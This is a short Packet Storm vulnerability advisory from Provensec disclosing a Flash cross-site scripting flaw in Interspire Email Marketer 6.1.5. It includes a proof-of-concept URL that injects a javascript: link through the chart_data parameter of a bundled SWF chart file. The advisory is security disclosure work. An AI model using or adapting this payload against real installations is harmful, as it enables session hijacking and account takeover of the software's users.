Interspire Email Marketer 6.1.5 Cross Site Scripting

2015-04-07T00:00:00
ID PACKETSTORM:131318
Type packetstorm
Reporter Provensec
Modified 2015-04-07T00:00:00

Description

                                        
                                            `# Affected software: interspire email marketer  
# Type of vulnerability:flash xss  
# URL:http://emailmarketer.interspire-demo.com/  
# Discovered by: provensec  
# Website: provensec.com  
  
#version: Interspire Email Marketer 6.1.5  
<http://www.interspire.com/emailmarketer/>  
# Proof of concept  
  
  
http://emailmarketer.interspire-demo.com/admin/functions/amcharts/amcolumn/amcolumn.swf?chart_settings=%3Csettings%3E%3C/settings%3E&chart_data=%3Cchart%3E%3Cmessage%3E%3C![CDATA[%3Ca%20href=%22javascript:confirm%28%27Your%20cookies%20and%20authentication%20have%20been%20captured%20and%20an%20attacker%20now%20owns%20your%20account%20and%20all%20your%20information.%27%29%22%3EXSS%20~%20Click%20Me!%3C/a%3E]]%3E%3C/message%3E%3C/chart%3E&.swf  
  
  
--   
  
Best Regards,  
Ankit Bharathan /*Security Researcher*  
[image: Provensec,llc] <http://provenec.com/>  
  
ankit.b@provensec.com  
  
Provensec,llc  
http://provenec.com  
  
P *Consider the environment. Please don't print this e-mail unless  
absolutely necessary.*  
`